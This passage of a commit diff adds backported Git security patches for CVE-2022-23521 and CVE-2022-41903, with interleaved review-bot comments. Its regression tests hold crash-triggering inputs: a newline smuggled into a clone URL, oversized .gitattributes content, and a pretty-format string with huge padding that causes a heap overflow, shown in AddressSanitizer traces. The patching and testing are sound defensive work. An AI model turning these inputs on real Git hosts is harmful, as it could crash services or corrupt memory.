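+@@ -1064,6 +1064,8 @@ static struct child_process *git_connect_git(int fd[2], char *hostandport,
+ target_host = xstrdup(hostandport);
+
+ transport_check_allowed("git");
++ if (strchr(target_host, '\n') || strchr(path, '\n'))
++ die(_("newline is forbidden in git:// hosts and repo paths"));
+
+ /*
+ * These underlying connection commands die() if they
+diff --git a/t/t5570-git-daemon.sh b/t/t5570-git-daemon.sh
+index 34487bb..79cd218 100755
+--- a/t/t5570-git-daemon.sh
++++ b/t/t5570-git-daemon.sh
+@@ -103,6 +103,11 @@ test_expect_success 'fetch notices corrupt idx' '
+ )
+ '
+
++test_expect_success 'client refuses to ask for repo with newline' '
++ test_must_fail git clone "$GIT_DAEMON_URL/repo$LF.git" dst 2>stderr &&
++ test_i18ngrep newline.is.forbidden stderr
++'
++
+ test_remote_error()
+ {
+ do_export=YesPlease
+--
+2.17.1
+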
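Review bot: The provenance lines of this backport are inconsistent with the rest of the commit. `Upstream-Status: Backported [...]` uses a value that differs from the `Backport` keyword on the other patches added here, and the `From:` header names the backporter although the sign-offs suggest the change was written upstream by Jeff King. For a security fix these fields are what reviewers, and presumably any patch-status tooling, use to trace the change back to its upstream commit. I would write `Upstream-Status: Backport [https://github.com/git/git/commit/a02ea577174ab8ed18f847cf1693f213e0b9c473]` and restore the upstream author in `From:`, keeping the backporter's `Signed-off-by`.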
diff --git a/meta/recipes-devtools/git/files/CVE-2022-23521.patch b/meta/recipes-devtools/git/files/CVE-2022-23521.patch
new file mode 100644
index 0000000000..974546013d
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-23521.patch
@@ -0,0 +1,367 @@
1From eb22e7dfa23da6bd9aed9bd1dad69e1e8e167d24 Mon Sep 17 00:00:00 2001
2From: Patrick Steinhardt <ps@pks.im>
3Date: Thu, 1 Dec 2022 15:45:15 +0100
4Subject: [PATCH] CVE-2022-23521
5
6attr: fix overflow when upserting attribute with overly long name
7
8The function `git_attr_internal()` is called to upsert attributes into
9the global map. And while all callers pass a `size_t`, the function
10itself accepts an `int` as the attribute name's length. This can lead to
11an integer overflow in case the attribute name is longer than `INT_MAX`.
12
13Now this overflow seems harmless as the first thing we do is to call
14`attr_name_valid()`, and that function only succeeds in case all chars
15in the range of `namelen` match a certain small set of chars. We thus
16can't do an out-of-bounds read as NUL is not part of that set and all
17strings passed to this function are NUL-terminated. And furthermore, we
18wouldn't ever read past the current attribute name anyway due to the
19same reason. And if validation fails we will return early.
20
21On the other hand it feels fragile to rely on this behaviour, even more
22so given that we pass `namelen` to `FLEX_ALLOC_MEM()`. So let's instead
23just do the correct thing here and accept a `size_t` as line length.
24
25Upstream-Status: Backport [https://github.com/git/git/commit/eb22e7dfa23da6bd9aed9bd1dad69e1e8e167d24 &https://github.com/git/git/commit/8d0d48cf2157cfb914db1f53b3fe40785b86f3aa & https://github.com/git/git/commit/24557209500e6ed618f04a8795a111a0c491a29c & https://github.com/git/git/commit/34ace8bad02bb14ecc5b631f7e3daaa7a9bba7d9 & https://github.com/git/git/commit/447ac906e189535e77dcb1f4bbe3f1bc917d4c12 & https://github.com/git/git/commit/e1e12e97ac73ded85f7d000da1063a774b3cc14f & https://github.com/git/git/commit/a60a66e409c265b2944f18bf43581c146812586d & https://github.com/git/git/commit/d74b1fd54fdbc45966d12ea907dece11e072fb2b & https://github.com/git/git/commit/dfa6b32b5e599d97448337ed4fc18dd50c90758f & https://github.com/git/git/commit/3c50032ff5289cc45659f21949c8d09e52164579
26
27CVE: CVE-2022-23521
28
29Reviewed-by: Sylvain Beucler <beuc@debian.org>
30Signed-off-by: Patrick Steinhardt <ps@pks.im>
31Signed-off-by: Junio C Hamano <gitster@pobox.com>
32Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
33---
34 attr.c | 97 +++++++++++++++++++++++++++----------------
35 attr.h | 12 ++++++
36 t/t0003-attributes.sh | 59 ++++++++++++++++++++++++++
37 3 files changed, 132 insertions(+), 36 deletions(-)
38
39diff --git a/attr.c b/attr.c
40index 11f19b5..63484ab 100644
41--- a/attr.c
42+++ b/attr.c
43@@ -29,7 +29,7 @@ static const char git_attr__unknown[] = "(builtin)unknown";
44 #endif
45
46 struct git_attr {
47- int attr_nr; /* unique attribute number */
48+ unsigned int attr_nr; /* unique attribute number */
49 char name[FLEX_ARRAY]; /* attribute name */
50 };
51
52@@ -221,7 +221,7 @@ static void report_invalid_attr(const char *name, size_t len,
53 * dictionary. If no entry is found, create a new attribute and store it in
54 * the dictionary.
55 */
56-static const struct git_attr *git_attr_internal(const char *name, int namelen)
57+static const struct git_attr *git_attr_internal(const char *name, size_t namelen)
58 {
59 struct git_attr *a;
60
61@@ -237,8 +237,8 @@ static const struct git_attr *git_attr_internal(const char *name, int namelen)
62 a->attr_nr = hashmap_get_size(&g_attr_hashmap.map);
63
64 attr_hashmap_add(&g_attr_hashmap, a->name, namelen, a);
65- assert(a->attr_nr ==
66- (hashmap_get_size(&g_attr_hashmap.map) - 1));
67+ if (a->attr_nr != hashmap_get_size(&g_attr_hashmap.map) - 1)
68+ die(_("unable to add additional attribute"));
69 }
70
71 hashmap_unlock(&g_attr_hashmap);
72@@ -283,7 +283,7 @@ struct match_attr {
73 const struct git_attr *attr;
74 } u;
75 char is_macro;
76- unsigned num_attr;
77+ size_t num_attr;
78 struct attr_state state[FLEX_ARRAY];
79 };
80
81@@ -300,7 +300,7 @@ static const char *parse_attr(const char *src, int lineno, const char *cp,
82 struct attr_state *e)
83 {
84 const char *ep, *equals;
85- int len;
86+ size_t len;
87
88 ep = cp + strcspn(cp, blank);
89 equals = strchr(cp, '=');
90@@ -344,8 +344,7 @@ static const char *parse_attr(const char *src, int lineno, const char *cp,
91 static struct match_attr *parse_attr_line(const char *line, const char *src,
92 int lineno, int macro_ok)
93 {
94- int namelen;
95- int num_attr, i;
96+ size_t namelen, num_attr, i;
97 const char *cp, *name, *states;
98 struct match_attr *res = NULL;
99 int is_macro;
100@@ -356,6 +355,11 @@ static struct match_attr *parse_attr_line(const char *line, const char *src,
101 return NULL;
102 name = cp;
103
104+ if (strlen(line) >= ATTR_MAX_LINE_LENGTH) {
105+ warning(_("ignoring overly long attributes line %d"), lineno);
106+ return NULL;
107+ }
108+
109 if (*cp == '"' && !unquote_c_style(&pattern, name, &states)) {
110 name = pattern.buf;
111 namelen = pattern.len;
112@@ -392,10 +396,9 @@ static struct match_attr *parse_attr_line(const char *line, const char *src,
113 goto fail_return;
114 }
115
116- res = xcalloc(1,
117- sizeof(*res) +
118- sizeof(struct attr_state) * num_attr +
119- (is_macro ? 0 : namelen + 1));
120+ res = xcalloc(1, st_add3(sizeof(*res),
121+ st_mult(sizeof(struct attr_state), num_attr),
122+ is_macro ? 0 : namelen + 1));
123 if (is_macro) {
124 res->u.attr = git_attr_internal(name, namelen);
125 } else {
126@@ -458,11 +461,12 @@ struct attr_stack {
127
128 static void attr_stack_free(struct attr_stack *e)
129 {
130- int i;
131+ unsigned i;
132 free(e->origin);
133 for (i = 0; i < e->num_matches; i++) {
134 struct match_attr *a = e->attrs[i];
135- int j;
136+ size_t j;
137+
138 for (j = 0; j < a->num_attr; j++) {
139 const char *setto = a->state[j].setto;
140 if (setto == ATTR__TRUE ||
141@@ -671,8 +675,8 @@ static void handle_attr_line(struct attr_stack *res,
142 a = parse_attr_line(line, src, lineno, macro_ok);
143 if (!a)
144 return;
145- ALLOC_GROW(res->attrs, res->num_matches + 1, res->alloc);
146- res->attrs[res->num_matches++] = a;
147+ ALLOC_GROW_BY(res->attrs, res->num_matches, 1, res->alloc);
148+ res->attrs[res->num_matches - 1] = a;
149 }
150
151 static struct attr_stack *read_attr_from_array(const char **list)
152@@ -711,21 +715,37 @@ void git_attr_set_direction(enum git_attr_direction new_direction)
153
154 static struct attr_stack *read_attr_from_file(const char *path, int macro_ok)
155 {
156+ struct strbuf buf = STRBUF_INIT;
157 FILE *fp = fopen_or_warn(path, "r");
158 struct attr_stack *res;
159- char buf[2048];
160 int lineno = 0;
161+ int fd;
162+ struct stat st;
163
164 if (!fp)
165 return NULL;
166- res = xcalloc(1, sizeof(*res));
167- while (fgets(buf, sizeof(buf), fp)) {
168- char *bufp = buf;
169- if (!lineno)
170- skip_utf8_bom(&bufp, strlen(bufp));
171- handle_attr_line(res, bufp, path, ++lineno, macro_ok);
172+
173+ fd = fileno(fp);
174+ if (fstat(fd, &st)) {
175+ warning_errno(_("cannot fstat gitattributes file '%s'"), path);
176+ fclose(fp);
177+ return NULL;
178 }
179+ if (st.st_size >= ATTR_MAX_FILE_SIZE) {
180+ warning(_("ignoring overly large gitattributes file '%s'"), path);
181+ fclose(fp);
182+ return NULL;
183+ }
184+
185+ CALLOC_ARRAY(res, 1);
186+ while (strbuf_getline(&buf, fp) != EOF) {
187+ if (!lineno && starts_with(buf.buf, utf8_bom))
188+ strbuf_remove(&buf, 0, strlen(utf8_bom));
189+ handle_attr_line(res, buf.buf, path, ++lineno, macro_ok);
190+ }
191+
192 fclose(fp);
193+ strbuf_release(&buf);
194 return res;
195 }
196
197@@ -736,13 +756,18 @@ static struct attr_stack *read_attr_from_index(const struct index_state *istate,
198 struct attr_stack *res;
199 char *buf, *sp;
200 int lineno = 0;
201+ size_t size;
202
203 if (!istate)
204 return NULL;
205
206- buf = read_blob_data_from_index(istate, path, NULL);
207+ buf = read_blob_data_from_index(istate, path, &size);
208 if (!buf)
209 return NULL;
210+ if (size >= ATTR_MAX_FILE_SIZE) {
211+ warning(_("ignoring overly large gitattributes blob '%s'"), path);
212+ return NULL;
213+ }
214
215 res = xcalloc(1, sizeof(*res));
216 for (sp = buf; *sp; ) {
217@@ -1012,12 +1037,12 @@ static int macroexpand_one(struct all_attrs_item *all_attrs, int nr, int rem);
218 static int fill_one(const char *what, struct all_attrs_item *all_attrs,
219 const struct match_attr *a, int rem)
220 {
221- int i;
222+ size_t i;
223
224- for (i = a->num_attr - 1; rem > 0 && i >= 0; i--) {
225- const struct git_attr *attr = a->state[i].attr;
226+ for (i = a->num_attr; rem > 0 && i > 0; i--) {
227+ const struct git_attr *attr = a->state[i - 1].attr;
228 const char **n = &(all_attrs[attr->attr_nr].value);
229- const char *v = a->state[i].setto;
230+ const char *v = a->state[i - 1].setto;
231
232 if (*n == ATTR__UNKNOWN) {
233 debug_set(what,
234@@ -1036,11 +1061,11 @@ static int fill(const char *path, int pathlen, int basename_offset,
235 struct all_attrs_item *all_attrs, int rem)
236 {
237 for (; rem > 0 && stack; stack = stack->prev) {
238- int i;
239+ unsigned i;
240 const char *base = stack->origin ? stack->origin : "";
241
242- for (i = stack->num_matches - 1; 0 < rem && 0 <= i; i--) {
243- const struct match_attr *a = stack->attrs[i];
244+ for (i = stack->num_matches; 0 < rem && 0 < i; i--) {
245+ const struct match_attr *a = stack->attrs[i - 1];
246 if (a->is_macro)
247 continue;
248 if (path_matches(path, pathlen, basename_offset,
249@@ -1071,11 +1096,11 @@ static void determine_macros(struct all_attrs_item *all_attrs,
250 const struct attr_stack *stack)
251 {
252 for (; stack; stack = stack->prev) {
253- int i;
254- for (i = stack->num_matches - 1; i >= 0; i--) {
255- const struct match_attr *ma = stack->attrs[i];
256+ unsigned i;
257+ for (i = stack->num_matches; i > 0; i--) {
258+ const struct match_attr *ma = stack->attrs[i - 1];
259 if (ma->is_macro) {
260- int n = ma->u.attr->attr_nr;
261+ unsigned int n = ma->u.attr->attr_nr;
262 if (!all_attrs[n].macro) {
263 all_attrs[n].macro = ma;
264 }
265@@ -1127,7 +1152,7 @@ void git_check_attr(const struct index_state *istate,
266 collect_some_attrs(istate, path, check);
267
268 for (i = 0; i < check->nr; i++) {
269- size_t n = check->items[i].attr->attr_nr;
270+ unsigned int n = check->items[i].attr->attr_nr;
271 const char *value = check->all_attrs[n].value;
272 if (value == ATTR__UNKNOWN)
273 value = ATTR__UNSET;
274diff --git a/attr.h b/attr.h
275index b0378bf..f424285 100644
276--- a/attr.h
277+++ b/attr.h
278@@ -1,6 +1,18 @@
279 #ifndef ATTR_H
280 #define ATTR_H
281
282+/**
283+ * The maximum line length for a gitattributes file. If the line exceeds this
284+ * length we will ignore it.
285+ */
286+#define ATTR_MAX_LINE_LENGTH 2048
287+
288+ /**
289+ * The maximum size of the giattributes file. If the file exceeds this size we
290+ * will ignore it.
291+ */
292+#define ATTR_MAX_FILE_SIZE (100 * 1024 * 1024)
293+
294 struct index_state;
295
296 /* An attribute is a pointer to this opaque structure */
297diff --git a/t/t0003-attributes.sh b/t/t0003-attributes.sh
298index 71e63d8..556245b 100755
299--- a/t/t0003-attributes.sh
300+++ b/t/t0003-attributes.sh
301@@ -342,4 +342,63 @@ test_expect_success 'query binary macro directly' '
302 test_cmp expect actual
303 '
304
305+test_expect_success 'large attributes line ignored in tree' '
306+ test_when_finished "rm .gitattributes" &&
307+ printf "path %02043d" 1 >.gitattributes &&
308+ git check-attr --all path >actual 2>err &&
309+ echo "warning: ignoring overly long attributes line 1" >expect &&
310+ test_cmp expect err &&
311+ test_must_be_empty actual
312+'
313+
314+test_expect_success 'large attributes line ignores trailing content in tree' '
315+ test_when_finished "rm .gitattributes" &&
316+ # older versions of Git broke lines at 2048 bytes; the 2045 bytes
317+ # of 0-padding here is accounting for the three bytes of "a 1", which
318+ # would knock "trailing" to the "next" line, where it would be
319+ # erroneously parsed.
320+ printf "a %02045dtrailing attribute\n" 1 >.gitattributes &&
321+ git check-attr --all trailing >actual 2>err &&
322+ echo "warning: ignoring overly long attributes line 1" >expect &&
323+ test_cmp expect err &&
324+ test_must_be_empty actual
325+'
326+
327+test_expect_success EXPENSIVE 'large attributes file ignored in tree' '
328+ test_when_finished "rm .gitattributes" &&
329+ dd if=/dev/zero of=.gitattributes bs=101M count=1 2>/dev/null &&
330+ git check-attr --all path >/dev/null 2>err &&
331+ echo "warning: ignoring overly large gitattributes file ${SQ}.gitattributes${SQ}" >expect &&
332+ test_cmp expect err
333+'
334+
335+test_expect_success 'large attributes line ignored in index' '
336+ test_when_finished "git update-index --remove .gitattributes" &&
337+ blob=$(printf "path %02043d" 1 | git hash-object -w --stdin) &&
338+ git update-index --add --cacheinfo 100644,$blob,.gitattributes &&
339+ git check-attr --cached --all path >actual 2>err &&
340+ echo "warning: ignoring overly long attributes line 1" >expect &&
341+ test_cmp expect err &&
342+ test_must_be_empty actual
343+'
344+
345+test_expect_success 'large attributes line ignores trailing content in index' '
346+ test_when_finished "git update-index --remove .gitattributes" &&
347+ blob=$(printf "a %02045dtrailing attribute\n" 1 | git hash-object -w --stdin) &&
348+ git update-index --add --cacheinfo 100644,$blob,.gitattributes &&
349+ git check-attr --cached --all trailing >actual 2>err &&
350+ echo "warning: ignoring overly long attributes line 1" >expect &&
351+ test_cmp expect err &&
352+ test_must_be_empty actual
353+'
354+
355+test_expect_success EXPENSIVE 'large attributes file ignored in index' '
356+ test_when_finished "git update-index --remove .gitattributes" &&
357+ blob=$(dd if=/dev/zero bs=101M count=1 2>/dev/null | git hash-object -w --stdin) &&
358+ git update-index --add --cacheinfo 100644,$blob,.gitattributes &&
359+ git check-attr --cached --all path >/dev/null 2>err &&
360+ echo "warning: ignoring overly large gitattributes blob ${SQ}.gitattributes${SQ}" >expect &&
361+ test_cmp expect err
362+'
363+
364 test_done
365--
3662.25.1
367
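Review bot: In `read_attr_from_index` the new oversize branch returns without releasing `buf`: once `buf = read_blob_data_from_index(istate, path, &size);` has succeeded, `if (size >= ATTR_MAX_FILE_SIZE) { ...; return NULL; }` leaves the function while still holding a blob of at least 100 MiB. The rest of the function is outside the hunk, so it is only inferred from the `if (!buf)` check that the caller owns this allocation; if it does, add `free(buf);` before that `return NULL;`. By contrast, `read_attr_from_file` calls `fclose(fp)` on both of its new early returns, so only the index path is affected. The size test also runs after the whole blob has been read, so it limits parsing work rather than the read itself.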
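--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-01.patch
@@ -0,0 +1,39 @@
+From a244dc5b0a629290881641467c7a545de7508ab2 Mon Sep 17 00:00:00 2001
+From: Carlo Marcelo Arenas Belón <carenas@gmail.com>
+Date: Tue, 2 Nov 2021 15:46:06 +0000
+Subject: [PATCH 01/12] test-lib: add prerequisite for 64-bit platforms
+
+Allow tests that assume a 64-bit `size_t` to be skipped in 32-bit
+platforms and regardless of the size of `long`.
+
+This imitates the `LONG_IS_64BIT` prerequisite.
+
+Signed-off-by: Carlo Marcelo Arenas Belón <carenas@gmail.com>
+Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/a244dc5b0a629290881641467c7a545de7508ab2]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ t/test-lib.sh | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+diff --git a/t/test-lib.sh b/t/test-lib.sh
+index e06fa02..db5ec2f 100644
+--- a/t/test-lib.sh
++++ b/t/test-lib.sh
+@@ -1613,6 +1613,10 @@ build_option () {
+ sed -ne "s/^$1: //p"
+ }
+
++test_lazy_prereq SIZE_T_IS_64BIT '
++ test 8 -eq "$(build_option sizeof-size_t)"
++'
++
+ test_lazy_prereq LONG_IS_64BIT '
+ test 8 -le "$(build_option sizeof-long)"
+ '
+--
+2.25.1
+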
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-02.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-02.patch
new file mode 100644
index 0000000000..f35e55b585
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-02.patch
@@ -0,0 +1,187 @@
1From 81dc898df9b4b4035534a927f3234a3839b698bf Mon Sep 17 00:00:00 2001
2From: Patrick Steinhardt <ps@pks.im>
3Date: Thu, 1 Dec 2022 15:46:25 +0100
4Subject: [PATCH 02/12] pretty: fix out-of-bounds write caused by integer overflow
5
6When using a padding specifier in the pretty format passed to git-log(1)
7we need to calculate the string length in several places. These string
8lengths are stored in `int`s though, which means that these can easily
9overflow when the input lengths exceeds 2GB. This can ultimately lead to
10an out-of-bounds write when these are used in a call to memcpy(3P):
11
12 ==8340==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f1ec62f97fe at pc 0x7f2127e5f427 bp 0x7ffd3bd63de0 sp 0x7ffd3bd63588
13 WRITE of size 1 at 0x7f1ec62f97fe thread T0
14 #0 0x7f2127e5f426 in __interceptor_memcpy /usr/src/debug/gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:827
15 #1 0x5628e96aa605 in format_and_pad_commit pretty.c:1762
16 #2 0x5628e96aa7f4 in format_commit_item pretty.c:1801
17 #3 0x5628e97cdb24 in strbuf_expand strbuf.c:429
18 #4 0x5628e96ab060 in repo_format_commit_message pretty.c:1869
19 #5 0x5628e96acd0f in pretty_print_commit pretty.c:2161
20 #6 0x5628e95a44c8 in show_log log-tree.c:781
21 #7 0x5628e95a76ba in log_tree_commit log-tree.c:1117
22 #8 0x5628e922bed5 in cmd_log_walk_no_free builtin/log.c:508
23 #9 0x5628e922c35b in cmd_log_walk builtin/log.c:549
24 #10 0x5628e922f1a2 in cmd_log builtin/log.c:883
25 #11 0x5628e9106993 in run_builtin git.c:466
26 #12 0x5628e9107397 in handle_builtin git.c:721
27 #13 0x5628e9107b07 in run_argv git.c:788
28 #14 0x5628e91088a7 in cmd_main git.c:923
29 #15 0x5628e939d682 in main common-main.c:57
30 #16 0x7f2127c3c28f (/usr/lib/libc.so.6+0x2328f)
31 #17 0x7f2127c3c349 in __libc_start_main (/usr/lib/libc.so.6+0x23349)
32 #18 0x5628e91020e4 in _start ../sysdeps/x86_64/start.S:115
33
34 0x7f1ec62f97fe is located 2 bytes to the left of 4831838265-byte region [0x7f1ec62f9800,0x7f1fe62f9839)
35 allocated by thread T0 here:
36 #0 0x7f2127ebe7ea in __interceptor_realloc /usr/src/debug/gcc/libsanitizer/asan/asan_malloc_linux.cpp:85
37 #1 0x5628e98774d4 in xrealloc wrapper.c:136
38 #2 0x5628e97cb01c in strbuf_grow strbuf.c:99
39 #3 0x5628e97ccd42 in strbuf_addchars strbuf.c:327
40 #4 0x5628e96aa55c in format_and_pad_commit pretty.c:1761
41 #5 0x5628e96aa7f4 in format_commit_item pretty.c:1801
42 #6 0x5628e97cdb24 in strbuf_expand strbuf.c:429
43 #7 0x5628e96ab060 in repo_format_commit_message pretty.c:1869
44 #8 0x5628e96acd0f in pretty_print_commit pretty.c:2161
45 #9 0x5628e95a44c8 in show_log log-tree.c:781
46 #10 0x5628e95a76ba in log_tree_commit log-tree.c:1117
47 #11 0x5628e922bed5 in cmd_log_walk_no_free builtin/log.c:508
48 #12 0x5628e922c35b in cmd_log_walk builtin/log.c:549
49 #13 0x5628e922f1a2 in cmd_log builtin/log.c:883
50 #14 0x5628e9106993 in run_builtin git.c:466
51 #15 0x5628e9107397 in handle_builtin git.c:721
52 #16 0x5628e9107b07 in run_argv git.c:788
53 #17 0x5628e91088a7 in cmd_main git.c:923
54 #18 0x5628e939d682 in main common-main.c:57
55 #19 0x7f2127c3c28f (/usr/lib/libc.so.6+0x2328f)
56 #20 0x7f2127c3c349 in __libc_start_main (/usr/lib/libc.so.6+0x23349)
57 #21 0x5628e91020e4 in _start ../sysdeps/x86_64/start.S:115
58
59 SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/src/debug/gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:827 in __interceptor_memcpy
60 Shadow bytes around the buggy address:
61 0x0fe458c572a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
62 0x0fe458c572b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
63 0x0fe458c572c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
64 0x0fe458c572d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
65 0x0fe458c572e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
66 =>0x0fe458c572f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]
67 0x0fe458c57300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
68 0x0fe458c57310: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
69 0x0fe458c57320: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
70 0x0fe458c57330: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
71 0x0fe458c57340: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
72 Shadow byte legend (one shadow byte represents 8 application bytes):
73 Addressable: 00
74 Partially addressable: 01 02 03 04 05 06 07
75 Heap left redzone: fa
76 Freed heap region: fd
77 Stack left redzone: f1
78 Stack mid redzone: f2
79 Stack right redzone: f3
80 Stack after return: f5
81 Stack use after scope: f8
82 Global redzone: f9
83 Global init order: f6
84 Poisoned by user: f7
85 Container overflow: fc
86 Array cookie: ac
87 Intra object redzone: bb
88 ASan internal: fe
89 Left alloca redzone: ca
90 Right alloca redzone: cb
91 ==8340==ABORTING
92
93The pretty format can also be used in `git archive` operations via the
94`export-subst` attribute. So this is what in our opinion makes this a
95critical issue in the context of Git forges which allow to download an
96archive of user supplied Git repositories.
97
98Fix this vulnerability by using `size_t` instead of `int` to track the
99string lengths. Add tests which detect this vulnerability when Git is
100compiled with the address sanitizer.
101
102Reported-by: Joern Schneeweisz <jschneeweisz@gitlab.com>
103Original-patch-by: Joern Schneeweisz <jschneeweisz@gitlab.com>
104Modified-by: Taylor Blau <me@ttalorr.com>
105Signed-off-by: Patrick Steinhardt <ps@pks.im>
106Signed-off-by: Junio C Hamano <gitster@pobox.com>
107
108Upstream-Status: Backport [https://github.com/git/git/commit/81dc898df9b4b4035534a927f3234a3839b698bf]
109CVE: CVE-2022-41903
110Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
111---
112 pretty.c | 11 ++++++-----
113 t/t4205-log-pretty-formats.sh | 17 +++++++++++++++++
114 2 files changed, 23 insertions(+), 5 deletions(-)
115
116diff --git a/pretty.c b/pretty.c
117index b32f036..637e344 100644
118--- a/pretty.c
119+++ b/pretty.c
120@@ -1427,7 +1427,9 @@ static size_t format_and_pad_commit(struct strbuf *sb, /* in UTF-8 */
121 struct format_commit_context *c)
122 {
123 struct strbuf local_sb = STRBUF_INIT;
124- int total_consumed = 0, len, padding = c->padding;
125+ size_t total_consumed = 0;
126+ int len, padding = c->padding;
127+
128 if (padding < 0) {
129 const char *start = strrchr(sb->buf, '\n');
130 int occupied;
131@@ -1439,7 +1441,7 @@ static size_t format_and_pad_commit(struct strbuf *sb, /* in UTF-8 */
132 }
133 while (1) {
134 int modifier = *placeholder == 'C';
135- int consumed = format_commit_one(&local_sb, placeholder, c);
136+ size_t consumed = format_commit_one(&local_sb, placeholder, c);
137 total_consumed += consumed;
138
139 if (!modifier)
140@@ -1505,7 +1507,7 @@ static size_t format_and_pad_commit(struct strbuf *sb, /* in UTF-8 */
141 }
142 strbuf_addbuf(sb, &local_sb);
143 } else {
144- int sb_len = sb->len, offset = 0;
145+ size_t sb_len = sb->len, offset = 0;
146 if (c->flush_type == flush_left)
147 offset = padding - len;
148 else if (c->flush_type == flush_both)
149@@ -1528,8 +1530,7 @@ static size_t format_commit_item(struct strbuf *sb, /* in UTF-8 */
150 const char *placeholder,
151 void *context)
152 {
153- int consumed;
154- size_t orig_len;
155+ size_t consumed, orig_len;
156 enum {
157 NO_MAGIC,
158 ADD_LF_BEFORE_NON_EMPTY,
159diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
160index f42a69f..a2acee1 100755
161--- a/t/t4205-log-pretty-formats.sh
162+++ b/t/t4205-log-pretty-formats.sh
163@@ -788,4 +788,21 @@ test_expect_success '%S in git log --format works with other placeholders (part
164 test_cmp expect actual
165 '
166
167+test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message' '
168+ # We only assert that this command does not crash. This needs to be
169+ # executed with the address sanitizer to demonstrate failure.
170+ git log -1 --pretty="format:%>(2147483646)%x41%41%>(2147483646)%x41" >/dev/null
171+'
172+
173+test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'set up huge commit' '
174+ test-tool genzeros 2147483649 | tr "\000" "1" >expect &&
175+ huge_commit=$(git commit-tree -F expect HEAD^{tree})
176+'
177+
178+test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message' '
179+ git log -1 --format="%B%<(1)%x30" $huge_commit >actual &&
180+ echo 0 >>expect &&
181+ test_cmp expect actual
182+'
183+
184 test_done
185--
1862.25.1
187
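Review bot: In `format_and_pad_commit` only the accumulators were widened: `int len, padding = c->padding;` keeps both operands `int`, so in the last pretty.c hunk `offset = padding - len;` is still computed as `int` and only then converted to the new `size_t offset`. A negative difference would become a very large offset. The condition that selects this `else` branch is outside the hunk, so it cannot be confirmed from here that `len <= padding` always holds there. Since this file is 02/12 of a series, it should be applied only together with the later patches, and the assumption deserves a comment above the assignment, e.g. `/* len <= padding on this branch */`. The two tests added to t4205 also share the title 'log --pretty with huge commit message', which makes a failure report ambiguous.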
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-03.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-03.patch
new file mode 100644
index 0000000000..d83d77eaf7
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-03.patch
@@ -0,0 +1,146 @@
1From b49f309aa16febeddb65e82526640a91bbba3be3 Mon Sep 17 00:00:00 2001
2From: Patrick Steinhardt <ps@pks.im>
3Date: Thu, 1 Dec 2022 15:46:30 +0100
4Subject: [PATCH 03/12] pretty: fix out-of-bounds read when left-flushing with stealing
5
6With the `%>>(<N>)` pretty formatter, you can ask git-log(1) et al to
7steal spaces. To do so we need to look ahead of the next token to see
8whether there are spaces there. This loop takes into account ANSI
9sequences that end with an `m`, and if it finds any it will skip them
10until it finds the first space. While doing so it does not take into
11account the buffer's limits though and easily does an out-of-bounds
12read.
13
14Add a test that hits this behaviour. While we don't have an easy way to
15verify this, the test causes the following failure when run with
16`SANITIZE=address`:
17
18 ==37941==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000000baf at pc 0x55ba6f88e0d0 bp 0x7ffc84c50d20 sp 0x7ffc84c50d10
19 READ of size 1 at 0x603000000baf thread T0
20 #0 0x55ba6f88e0cf in format_and_pad_commit pretty.c:1712
21 #1 0x55ba6f88e7b4 in format_commit_item pretty.c:1801
22 #2 0x55ba6f9b1ae4 in strbuf_expand strbuf.c:429
23 #3 0x55ba6f88f020 in repo_format_commit_message pretty.c:1869
24 #4 0x55ba6f890ccf in pretty_print_commit pretty.c:2161
25 #5 0x55ba6f7884c8 in show_log log-tree.c:781
26 #6 0x55ba6f78b6ba in log_tree_commit log-tree.c:1117
27 #7 0x55ba6f40fed5 in cmd_log_walk_no_free builtin/log.c:508
28 #8 0x55ba6f41035b in cmd_log_walk builtin/log.c:549
29 #9 0x55ba6f4131a2 in cmd_log builtin/log.c:883
30 #10 0x55ba6f2ea993 in run_builtin git.c:466
31 #11 0x55ba6f2eb397 in handle_builtin git.c:721
32 #12 0x55ba6f2ebb07 in run_argv git.c:788
33 #13 0x55ba6f2ec8a7 in cmd_main git.c:923
34 #14 0x55ba6f581682 in main common-main.c:57
35 #15 0x7f2d08c3c28f (/usr/lib/libc.so.6+0x2328f)
36 #16 0x7f2d08c3c349 in __libc_start_main (/usr/lib/libc.so.6+0x23349)
37 #17 0x55ba6f2e60e4 in _start ../sysdeps/x86_64/start.S:115
38
39 0x603000000baf is located 1 bytes to the left of 24-byte region [0x603000000bb0,0x603000000bc8)
40 allocated by thread T0 here:
